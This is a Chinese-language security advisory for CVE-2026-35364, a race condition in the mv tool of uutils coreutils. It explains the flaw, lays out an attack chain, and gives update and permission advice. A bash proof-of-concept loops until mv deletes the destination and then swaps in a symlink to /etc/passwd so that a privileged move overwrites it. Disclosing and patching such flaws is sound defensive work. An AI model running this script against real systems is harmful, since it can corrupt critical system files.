CVE-2026-35364 CVSS 6.3 中危

CVE-2026-35364: uutils coreutils TOCTOU竞争条件漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35364

漏洞类型

TOCTOU竞争条件

CVSS评分

6.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

uutils coreutils

漏洞概述

uutils coreutils的mv工具在执行跨设备操作时存在TOCTOU竞争条件漏洞。由于该工具在重新创建目标路径前会先移除原路径，拥有目标目录写权限的本地攻击者可利用此时间差将目标替换为符号链接。这将导致后续的特权移动操作跟随该链接，进而用源文件内容覆盖任意目标文件。

技术细节

该漏洞源于uutils coreutils中mv工具在处理跨设备移动时的逻辑缺陷。当检测到源和目标位于不同设备时，mv会执行“删除目标”然后“复制源文件”的操作。在删除旧目标文件和创建新目标文件之间存在一个时间窗口。攻击者如果具有目标目录的写权限，可以在此窗口期内迅速将目标路径替换为一个指向任意系统文件的符号链接。由于mv工具在后续复制过程中未检查目标是否已被篡改，它会跟随该符号链接写入数据。这导致低权限攻击者可以利用高权限的mv进程（如通过sudo执行）来覆盖系统中的任意文件，造成高完整性和可用性影响。

攻击链分析

STEP 1

步骤1

攻击者识别出受害者在跨设备操作中使用mv工具，且攻击者对目标目录拥有写权限。

STEP 2

步骤2

受害者或特权进程启动mv命令，工具首先删除目标路径下的现有文件。

STEP 3

步骤3

在mv删除文件但尚未复制新文件的时间窗口内，攻击者迅速将目标路径替换为指向敏感文件（如/etc/passwd）的符号链接。

STEP 4

步骤4

mv工具继续执行复制操作，跟随符号链接将源数据写入敏感文件，导致文件被篡改或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-35364: Exploiting TOCTOU in uutils mv cross-device move
# Prerequisites: Attacker has write access to the destination directory.
# Usage: Run this script in the background while a privileged user runs 'mv src dest'.

DEST_DIR="/tmp/vuln_dir"
DEST_FILE="$DEST_DIR/target"
TARGET_FILE="/etc/passwd" # Arbitrary file to overwrite

# Ensure destination directory exists and is empty (setup)
mkdir -p "$DEST_DIR"
touch "$DEST_FILE"

echo "[+] Starting race condition exploit..."

while true; do
    # Check if the destination file has been removed by mv
    if [ ! -e "$DEST_FILE" ]; then
        # Race window: mv has deleted the file but not yet created the new one
        # Replace it with a symlink to the target file
        ln -s "$TARGET_FILE" "$DEST_FILE" 2>/dev/null
        if [ $? -eq 0 ]; then
            echo "[!] Symlink created successfully. Target may be overwritten."
            break
        fi
    fi
done

影响范围

uutils coreutils (修复CVE-2026-35364之前的版本)

防御指南

临时缓解措施

建议立即更新uutils coreutils软件包以修复该TOCTOU漏洞。在无法立即更新的情况下，应避免在攻击者可控的目录中使用root或其他高权限账户执行跨设备的mv命令，并检查目标目录的权限设置，确保仅受信用户具有写入权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-35364
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-35364
3 Details https://www.cvedetails.com/cve/CVE-2026-35364/
4 VulDB https://vuldb.com/cve/CVE-2026-35364
5 Link https://github.com/uutils/coreutils/issues/10015
6 Link https://github.com/uutils/coreutils/issues/10015

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表